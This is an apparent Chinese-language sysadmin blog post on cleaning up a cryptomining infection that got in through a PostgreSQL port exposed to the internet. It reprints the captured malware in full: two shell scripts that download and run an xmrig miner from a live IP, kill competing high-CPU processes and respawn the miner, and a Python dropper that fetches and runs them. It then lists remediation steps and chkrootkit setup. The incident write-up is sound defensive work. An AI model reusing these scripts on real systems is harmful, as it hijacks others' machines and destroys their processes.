內網一臺服務器cpu爆滿,第6感猜測中了挖礦病毒,以下爲cpu爆滿監控圖表
趕緊ssh進系統,top了下,一個./x3e536747 進程佔用了大量的cpu,cpu load average超過了cpu內核數,先kill掉進程,不用猜,等會肯定會繼續啓動,檢查開放端口,發現postgresql直接對外開放的。肯定是通過這個入口***進來的;暫時關閉外網pg 5432端口;找到挖礦執行路徑,都在/tmp下,我拷貝了出來,放一個sh腳本上來大家一起研究
第一個腳本keeper-64.sh
#!/bin/sh
sPid=$$
mPid=''
mName='/tmp/.jgqwrjqwkhdoaeyhq'
checkCmd() {
command -v $1 >/dev/null 2>&1
}
downloader () {
if checkCmd wget; then
wget $1 -O $2
elif checkCmd curl; then
curl $1 -o $2
else
if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then
python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"
else
python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"
fi
fi
chmod +x $2
}
killer() {
for tmpVar in `ps -aeo pid,%cpu,command | sed 1d | sort -k 2 | tail -n 10 | awk '{print $1}'`; do
if [ $tmpVar = $sPid ]; then
continue
fi
if [ $tmpVar = $mPid ]; then
continue
fi
if [ `ps -o %cpu $tmpVar | sed 1d | sed 's/\..*//g'` -ge 60 ]; then
if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep jgqwrjqwkhdoaeyhq` ]; then
echo "found jgqwrjqwkhdoaeyhq"
continue
fi
kill -9 $tmpVar
rm -f `ls -l /proc/$tmpVar/exe 2>&1 | sed 's/.*-> //g'`
fi
done
}
runer() {
if [ -z "$mPid" ]; then
if [ ! -f $mName ]; then
downloader http://165.227.51.68/xmrig-64 $mName
$mName
else
$mName
fi
fi
mPid=`ps -eo pid,command | grep $mName | head -n 1 | awk '{print $1}'`
}
downloader http://165.227.51.68/xmrig-64 $mName
runer
killer
pkill python
while true; do
sleep 10
if ps -p $mPid > /dev/null; then
killer
else
mPid=''
runer
fi
done
第二個腳本j23k6hl2k4jlk21.sh
#!/bin/sh
sPid=$$
mPid=''
mName='/tmp/.jgqwrjqwkhdoaeyhq'
checkCmd() {
command -v $1 >/dev/null 2>&1
}
downloader () {
if checkCmd wget; then
wget $1 -O $2
elif checkCmd curl; then
curl $1 -o $2
else
if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then
python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"
else
python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"
fi
fi
chmod +x $2
}
killer() {
for tmpVar in `ps -aeo pid,%cpu,command | sed 1d | sort -k 2 | tail -n 10 | awk '{print $1}'`; do
if [ $tmpVar = $sPid ]; then
continue
fi
if [ $tmpVar = $mPid ]; then
continue
fi
if [ `ps -o %cpu $tmpVar | sed 1d | sed 's/\..*//g'` -ge 60 ]; then
if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep jgqwrjqwkhdoaeyhq` ]; then
echo "found jgqwrjqwkhdoaeyhq"
continue
fi
kill -9 $tmpVar
rm -f `ls -l /proc/$tmpVar/exe 2>&1 | sed 's/.*-> //g'`
fi
done
}
runer() {
if [ -z "$mPid" ]; then
if [ ! -f $mName ]; then
downloader http://165.227.51.68/xmrig-64 $mName
$mName
else
$mName
fi
fi
mPid=`ps -eo pid,command | grep $mName | head -n 1 | awk '{print $1}'`
}
downloader http://165.227.51.68/xmrig-64 $mName
runer
killer
pkill python
while true; do
sleep 10
if ps -p $mPid > /dev/null; then
killer
else
mPid=''
runer
fi
done
第三個python腳本
remote_path64 = "http://165.227.51.68/keeper-64.sh"
remote_path32 = "http://165.227.51.68/keeper-32.sh"
output_path = '/tmp/j23k6hl2k4jlk21.sh'
command = 'chmod 777 /tmp/j23k6hl2k4jlk21.sh&&sh /tmp/j23k6hl2k4jlk21.sh&&rm -rf /tmp/*.py'
#command = 'chmod 777 /tmp/jhkjqhwru1h4&&nohup /tmp/jhkjqhwru1h4&&rm -rf /tmp/*.py'
import platform
check = platform.architecture()
if "64bit" in check:
remote_path = remote_path64
print remote_path
elif "32bit" in check:
remote_path = remote_path32
print remote_path
else:
exit()
def getRequest():
request = ''
try:
# for python 3.x
import urllib.request
request = urllib.request
except:
# for python 2.x
import urllib
request = urllib
return request
def download(url):
request = getRequest()
res = request.urlopen(remote_path)
return res.read()
def put(path, data):
# file = open(path, "wb")
with open(path,'wb') as file:
file.write(data)
# file.close()
def run(cmd):
import os
os.system(cmd)
def main_station():
data = download(remote_path)
put(output_path, data)
run(command)
main_station()
發現下載挖礦病毒腳本是美國的
netstat -antup 看了下還有哪些異常ip連接,發現我的服務器還會跟法國一個ip進行80訪問連接,不用想,直接iptables drop掉這兩個ip;清空/tmp目錄,注意查看/tmp目錄時用ls -al 因爲發現挖礦腳本會用隱藏文件;
檢查計劃任務,沒有異常
cat /etc/passwd | grep bash發現postgresql是可以登錄的,
postgres:x:500:500:PostgreSQL:/opt/PostgreSQL/10:/sbin/nologin 改爲nologin
修改root密碼,使用chkrootkit檢查是否有文件命令被替換,發現/tmp有隱藏執行文件,
Searching for Backdoor.Linux.Mokes.a。。。。。。。INFECTED
刪除掉;
禁止root用戶登錄;
觀察一晚上,一切正常。。。
附chkrootkit安裝使用說明
安裝依賴包
yum install gcc gcc-c++ make glibc-static -y
下載安裝包
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz——無法下載自行用×××。。
tar -zxvf chkrootkit.tar.gz
cd chkrootkit-0.52
make sense
echo $? 爲0表示編譯不報錯
mv chkrootkit-0.52 /usr/local/chkrootkit
執行chkrootkit
/usr/local/chkrootkit/./chkrootkit | grep INFECTED——列出有infected表示文件被感染。可以到正常的系統拷貝替換回去。
直接運行執行結果
如果執行報錯,cant't find ssh
yum install openssh* -y